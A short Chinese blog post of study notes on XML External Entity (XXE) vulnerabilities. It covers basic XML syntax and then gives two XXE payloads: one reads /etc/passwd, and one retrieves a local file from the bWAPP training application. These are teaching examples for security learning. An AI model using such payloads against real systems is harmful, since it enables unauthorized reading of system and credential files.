XML External Entity attack

WEB安全   DYBOY  7356 2018-7-31 

标签: 学习笔记 xxe

XXE漏洞

XML 被设计用来传输和存储数据。

语法规则

<?xml version="1.0" encoding="UTF-8"?> <!--XML 声明-->
<girl age="18">  <!--自定的根元素girl;age属性需要加引导-->
<hair>长头发</hair>  <!--自定义的4个子元素,即girl对象的属性-->
<eye>大眼睛</eye>
<face>可爱的脸庞</face>
<summary>可爱美丽的女孩</summary>
</girl>  <!--根元素的闭合-->

Payload

获取账户密码:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note[
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>

<xxe>&xxe;</xxe>

password

获取flag.txt

读取网站任意文件:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note[
<!ENTITY xxe SYSTEM "http://127.0.0.1/bWAPP/robots.txt">
]>

<reset><login>&xxe;</login><secret>Any bugs?</secret></reset>

AWVS

Reference:
《XXE漏洞利用技巧:从XML到远程代码执行》
《安仔课堂:实战讲解XXE漏洞的利用与防御策略》

上一篇
NC Listener
下一篇
[代码审计]CmsEasy V6.2

版权声明:《 XML External Entity attack 》为DYBOY原创文章,转载请注明出处!
最后编辑:2018-7-31 21:07:08

相关推荐

23083人看过

[CTF]Bugku题解WEB部分

35231人看过

[代码审计]Emlog 6.0 Beta

9640人看过

第十一届全国大学生信息安全竞赛(西南赛区)WriteUp分析

17162人看过

TuziCMS 2.0.6 SQL注入漏洞分析

18225人看过

SQL注入判断数据库类型

发表评论 / Comment

用心评论~


Warning: Cannot modify header information - headers already sent by (output started at /www/wwwroot/blog.dyboy.cn/content/templates/dyblog/footer.php:56) in /www/wwwroot/blog.dyboy.cn/include/lib/view.php on line 23